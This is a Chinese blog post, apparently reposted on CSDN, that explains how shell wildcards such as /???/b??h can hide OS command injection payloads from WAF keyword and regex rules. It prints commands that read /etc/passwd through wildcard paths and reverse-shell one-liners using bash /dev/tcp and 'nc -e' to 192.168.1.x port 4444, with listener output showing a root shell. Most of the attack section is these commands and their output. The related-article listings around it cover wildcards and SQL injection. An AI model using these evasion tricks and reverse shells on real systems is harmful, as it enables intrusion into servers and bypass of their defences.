WEB安全番外第五篇--关于使用通配符进行OS命令注入绕WAF

最新推荐文章于 2022-11-30 15:00:16 发布
最新推荐文章于 2022-11-30 15:00:16 发布
阅读量237 收藏
点赞数
文章标签: runtime web安全 shell
原文链接:http://www.cnblogs.com/KevinGeorge/p/8444583.html
版权

一、通配符简介:

一般来讲,通配符包含*和?,都是英文符号,*用来匹配任意个任意字符,?用来匹配一个任意字符。

举个例子使用通配符查看文件,可以很名下看到打卡的文件是/etc/resolv.conf:

1 └─[$]> sudo head -5 /???/r????v.c??f
2 #
3 # macOS Notice
4 #
5 # This file is not consulted for DNS hostname resolution, address
6 # resolution, or the DNS query routing mechanism used by most

同理,删除文件的时候,如果删除所有a开头的文件:

1 rm -f a*

以上大概简要说明了什么是通配符

二、支持通配符的shell

从上文中可以看出Linux、Unix类操作系统命令行对于参数或者命令的值是支持通配符的,name命令本身是否支持通配符呢?

 1 └─[$]> sudo /???/c?t /???/r????v.?o?f
 2 #
 3 # macOS Notice
 4 #
 5 # This file is not consulted for DNS hostname resolution, address
 6 # resolution, or the DNS query routing mechanism used by most
 7 # processes on this system.
 8 #
 9 # To view the DNS configuration used by this system, use:
10 #   scutil --dns
11 #
12 # SEE ALSO
13 #   dns-sd(1), scutil(8)
14 #
15 # This file is automatically generated.
16 #

可以看出来,命令部分识别/???/c?t => /bin/cat

三、WAF规则集:

WAF对于payload部分的检测和响应(放行还是阻断)基于WAF引擎的固有的一套规则

例如对于OS Command Injection的payload过滤:

rule1   -> 过滤 | (%7c)字符 &的URL编码%26 甚至/(%2f)等等,过滤反引号``

rule2  -> 过滤命令关键字等等

rule3  -> 正则表达式匹配

四、绕WAF

1、发现/etc/passwd ->会报警,/???/p????d则不会,因为匹配的正则很可能这么写的匹配/[\w]{1,}/[\w]{1,} 对于rule3

2、举一个反弹shell的bash简单命令,这个对于rule2比较合适

//正常的反弹shell的命令
#bash -i >& /dev/tcp/192.168.1.102/4444 0>&1
#/???/b??h -i >& /dev/tcp/192.168.1.102/4444 0>&1
可以成功

在测试一个使用nc直接反弹的例子:

1 #正常情况下:
2 nc -e /bin/bash 192.168.1.101 4444
3 nv -p 4444 -l -v

可以转换成:

1 /???/nc -e /???/b??h 192.168.1.101 4444
2 # 我这里/bin下有个nl命令,所以n?打不出来,否则可以用n?来替换nc,且ip地址可以转换成为长整数

结果

1 [********@***]# nc -p 4444 -l -v
2 Ncat: Version 6.40 ( http://nmap.org/ncat )
3 Ncat: Listening on :::4444
4 Ncat: Listening on 0.0.0.0:4444
5 Ncat: Connection from ******.
6 Ncat: Connection from ******:43568.
7 whoami
8 root

搞定了

综上,这个办法还是很有用的。

 

转载于:https://www.cnblogs.com/KevinGeorge/p/8444583.html

weixin_30256901
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux 基础 23-文件和目录命令-05-ls和通配符的联合使用.flv
04-11
Linux 基础 23-文件和目录命令-05-ls和通配符的联合使用.flv
asp.net request防sql注入_技术干货 | 常见的mysql注入语句
weixin_39828102的博客
11-28 103
(1)不用用户名和密码1 //正常语句2 $sql =”select * from phpben where user_name=’admin’and pwd =’123′”;3 //在用户名框输入’or’=’or’或 ‘or 1=’1 然后sql如下4 $sql =”select * from phpben where user_name=’‘or’=’or” and pwd =” “...
Linux提权
小袁的博客
11-30 1247
linux提权
【零散知识点总结1】
weixin_44543307的博客
03-06 4443
零散笔记总结@Reference、@Autowired和@Resource的区别:Dubbohttp和HTTPSvue.js跟thymeleaf 的区别web开发,提供3个@Component注解衍生注解(功能一样)取代 @Reference、@Autowired和@Resource的区别: @Reference:是dubbo的注解,也是注入,他一般注入的是分布式的远程服务的对象,需要dubbo配置使用。 @Autowired:org.springframework.beans.factor
Mybatis
m0_58605102的博客
03-29 1169
Mybatis中模糊查询的问题
命令注入总结
weixin_44576725的博客
12-15 6173
文章目录命令注入总结原理常见的危险函数PHPsystemexecpassthrushell_execpopenproc_open反引号Pythonsystempopensubprocess.call/subprocess.runspawnJavajava.lang.Runtime.getRuntime().exec(command)Linux下常用的符号特殊符号通配符常用命令分隔与执行多条命令空格过 escapeshellcmd黑名单过无参数rce过滤字母或数字常用读取文件方式常用读取目录方式利
dot-wild:使用强大的点符号(点路径 + 通配符)来操作 JSON 的属性
05-29
使用功能强大的点符号(点路径+通配符)来操纵JSON的属性。 目录 安装 $ npm install dot-wild --save # or $ yarn add dot-wild 用法 基本的 import * as dot from 'dot-wild' ; /** * Getter */ dot . get ( {...
Linux运维-运维系统服务04-Shell脚本d1-15shell中的通配符.mp4
06-20
Linux运维-运维系统服务04-Shell脚本d1-15shell中的通配符.mp4
babel-plugin-wildcard:通配符导入可导入目录JS文件
04-30
babel-plugin-wildcard 允许您在编译时从目录import所有文件。 安装 $ npm install babel-plugin-wildcard 用法 通过.babelrc (推荐) .babelrc { " plugins " : [ " wildcard " ] ...$ babel --plugins include ...
consulate-validate-redirect-uri:使用通配符支持对领事馆的简单、安全的重定向 uri 检查
06-26
领事馆验证重定向uri 使用通配符支持对简单、安全的重定向 uri 检查用法只需将consulate-validate-redirect-uri为您的服务器的插件: var consulate = require ( 'consulate' ) , uriCheck = require ( 'consulate-...
mybatis模糊查询防止通配符注入
一只渣渣程序猿
08-23 858
模糊查询一般这么写 <if test="dto.specialSubjectName !=null and dto.specialSubjectName !=''"> AND a.materials_name LIKE CONCAT('%',#{dto.specialSubjectName},'%') </if> 问题: 当用户输入了% _ 等通配符之后,若后端不进行过滤处理的话,传到数据库就是这个样子的。 AND a.materials_name LIKE '%.
mybatis中的like查询,$取值时防sql注入通配符注入,#取值时防通配符注入
luoyong at csdn
12-11 8858
在mybatis中用like查询时,如果用户输入的值有"_"和“%”,则会出现这种情况: 用户本来只是想查询“abcd_”,查询结果中却有"abcd_"、"abcde"、"abcde"等等,用户要查询"30%"(注:百分之三十)时也会出现问题。 测试后发现不管你是用#{xxxx }还是用${xxxx }取值都会存在这些问题,而且用${xxxx }取值时还存在sql注入的问题。 为了解决这些问
SQL通配符过滤
xrj333的博客
01-21 161
百分号%通配符 select prod_id , prod_name from products where prod_name like 'jet%' select prod_id , prod_name from products where prod_name like '%anvi1%' select prod_id , prod_name from products where pr...
Mybatis 通配符# 以及 $的使用
smithdoudou88的专栏
12-11 4678
1. MyBatis中使用parameterType向SQL语句传参,parameterType后的类型可以是基本类型int,String,HashMap和java自定义类型等。 OK~ 2.一般用在xml写SQL都是用#,如#{param}。但是有时会看到用$的时候,如${param}。 3. 那么$ 和 # ,有什么区别呢?    使用#{para}引
通配符使用方法(初学)
weixin_30420305的博客
02-07 1010
通配符使用方法(部分) 在实验楼的Linux 基础入门(新版)实验2:基本概念及操作中,有介绍集中通配符如下: 但是部分不是很好理解,以下是我通过查资料、实验整理的部分用法 “?”和“*” 通配符 用法 ? 匹配任意一个字符 * 匹配0或多个字符 ?和*的用法较为简单,举例说明 在终端中输入 cd Desktop touch test{1..5}.txt tou...
通配符
shade7的博客
09-25 3319
1、通配符:用来匹配文件名或目录            (匹配文件内容用正则表达式) ?   匹配任意一个字符 *     匹配0个或任意多个字符,也就是可以匹配任何内容 【】  匹配括号中的任意一个字符 。eg:【abc】匹配一个字符,或a、或b、或c 【-】   匹配括号中任意一个字符    -代表一个范围,eg:【a-z】代表匹配一个小写字母 【^】    逻辑非,表示匹配不是中括...
屏蔽用户输入查询通配符‘%’或‘_’
红尘浪子的专栏
08-07 1885
问题:在模糊查询的SQL语句中,如果有用户输入查询通配符‘%’,使用 select * from table where code like '%condition%'的SQL,会查出全部记录,这个如何解决? if(!StringUtils.isEmpty(_cname)){ /** 处理模糊通配符%和_ */ sql.append("
sql使用小技巧之通配符(like查询)的使用
热门推荐
luyaran的博客
09-06 1万+
通配符可用于替代字符串中的任何其他字符,在 SQL 中,通配符与 SQL LIKE 操作符一起使用,并且用于搜索表中的数据。在 SQL 中,可使用以下通配符通配符 描述 % 替代 0 个或多个字符 _ 替代一个字符 [charlist] 字符列中的任何单一字符 [^charlist] 或 [!charlist] 不在字符列中的任何单一...
带你认识Linux中的通配符
weixin_33974433的博客
12-03 227
通配符是一种特殊语句,用来模糊搜索文件,当查找文件夹时,可以使用它来代替一个或多个真正的字符,它使得文件管理更加快速,便捷,大大的提升了工作效率。 常用的通配符有 * 、? 、[] 等(可通过man 7 glob的帮助文档来查看所有通配符) 1,* 代表任意长度的任意字符: 示例:ls -d /etc/a* 显示/etc目录下所有以a开头的文件与目录: 2,? 表示任意单个字符: 示例...
在rt-thread如何实现使用通配符匹配文件名
最新发布
03-25
在rt-thread中,可以通过使用通配符匹配文件名来搜索文件系统中的文件。具体实现方法如下: 1. 编写一个递归函数,遍历文件系统中的所有文件和目录。 2. 对于每个目录,递归调用该函数,直到找到匹配的文件。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值